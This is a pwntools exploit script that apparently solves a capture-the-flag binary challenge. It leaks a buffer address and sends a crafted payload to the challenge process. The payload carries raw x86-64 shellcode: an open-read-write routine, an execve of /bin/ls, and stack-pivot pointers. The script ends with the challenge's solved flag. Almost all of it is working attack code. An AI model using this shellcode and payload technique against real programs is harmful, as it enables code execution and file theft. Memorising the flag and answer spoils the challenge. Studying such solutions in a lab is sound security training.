from pwn import *

e = ELF("./chall_patched")
libc = ELF("./libc.so.6")
ld = ELF("./ld-linux-x86-64.so.2")

script = '''
b *main+138
b *vuln+210
b *vuln+152
'''

#p = remote("chall.w1playground.com", 19999)
p = process("./chall_patched")
#p = gdb.debug("./chall_patched", gdbscript = script)

p.recvuntil(b"Buffer: ")
buf = int(p.recvline()[:-1:], 16)
print(hex(buf))

shellcode = b"\x4D\x89\xFE\x49\x81\xC6\x08\x02\x00\x00\x49\x89\x26\x48\xC7\xC7\x00\x00\x00\x00\x48\xC7\xC0\x3C\x00\x00\x00\x0F\x05"

orw = b"\x6A\x32\x48\xB8\x31\x35\x31\x30\x64\x65\x35\x64\x50\x48\xB8\x38\x36\x36\x38\x35\x37\x38\x66\x50\x48\xB8\x61\x36\x32\x64\x31\x31\x62\x64\x50\x48\xB8\x2F\x36\x64\x63\x35\x66\x32\x30\x50\x48\x89\xE7\x48\x31\xF6\x48\x31\xD2\x48\xC7\xC0\x02\x00\x00\x00\x0F\x05\x48\x89\xC7\x48\x89\xE6\x48\x83\xEE\x30\x48\xC7\xC2\x30\x00\x00\x00\x48\xC7\xC0\x00\x00\x00\x00\x0F\x05\x48\xC7\xC7\x02\x00\x00\x00\x48\xC7\xC0\x01\x00\x00\x00\x0F\x05"

ls = b"\x48\x31\xD2\x48\xC7\xC7\x02\x00\x00\x00\x48\xC7\xC6\x01\x00\x00\x00\x48\xC7\xC0\x21\x00\x00\x00\x0F\x05\x48\x31\xD2\x48\xBF\x2F\x62\x69\x6E\x2F\x6C\x73\x00\x57\x48\x89\xE7\x6A\x2F\x48\x89\xE6\x6A\x00\x56\x57\x48\x89\xE6\x48\xC7\xC0\x3B\x00\x00\x00\x0F\x05"

flag = "6dc5f20a62d11bd8668578f1510de5d2"

payload = shellcode.ljust(0x80, b"\x00")
payload += p64(buf + 0x130) + p64(buf)
payload += ls
#payload += orw
payload = payload.ljust(0x800, b"\x00")
payload += p64(buf + 0xf38)
payload = payload.ljust(0x880, b"\x00")
payload += p64(buf + 0x880)
payload = payload.ljust(0x890, b"\x00")
payload += p64(buf + 0x880)
payload = payload.ljust(0x8a8, b"\x00")
payload += b"\x00" * 8

p.sendlineafter(b"shellcode: ", f"{len(payload)}".encode())
p.sendafter(b"Escape> ", payload)

p.interactive()
#W1{5uch_4_5p3ct4cul4r_35c4p3_c2sxYjFkMSEhISEh}